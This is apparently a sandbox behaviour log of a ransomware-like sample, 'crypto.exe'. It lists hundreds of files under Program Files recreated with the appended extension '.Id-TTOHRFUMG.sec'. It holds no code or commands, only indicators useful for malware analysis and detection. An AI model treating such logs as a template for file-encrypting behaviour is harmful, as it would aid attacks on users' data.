File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_record_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OrielResume.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libdirectory_demux_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Inuvik.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309904.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WWINTL.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\jni.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Qatar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Minsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsColorChart.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALENDAR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\INDST_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252669.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_av1_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\keytool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.Infopath.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\JFONT.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hr.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libripple_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_performance_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Santiago.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105238.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EXSEC32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\en-US\msoeres.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PPINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.HK.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02265_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR32F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\README.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FRENCH.LNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\LATIN1.SHP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Discussion.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR36F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\INFOML.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\INFOMS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299587.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OMSINTL.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OrielLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmpgv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\fontmanager.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BRCHUR11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGATNGET.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libaddonsvorepository_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Cancun.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCARDHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\GREET11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00443_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01164_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Hovd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239997.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0281904.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107314.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\MET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01006_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\HORN.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Seoul.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\VVIEWDWG.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\MMSL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGTOC.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Country.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IPIRMV.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PPTICO.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSWAVY.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IEContentService.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\AdjacencyResume.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Elemental.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBSBR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\THOCRAPI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATWIZ11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234376.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\libxslt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-spi-actions.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00177_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18206_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02451_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\messageboxalert.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR9F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Genko_1.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Maroon.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libattachment_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADVCMP.DIC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00942_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\net.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Solstice.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7en.kic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\init.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
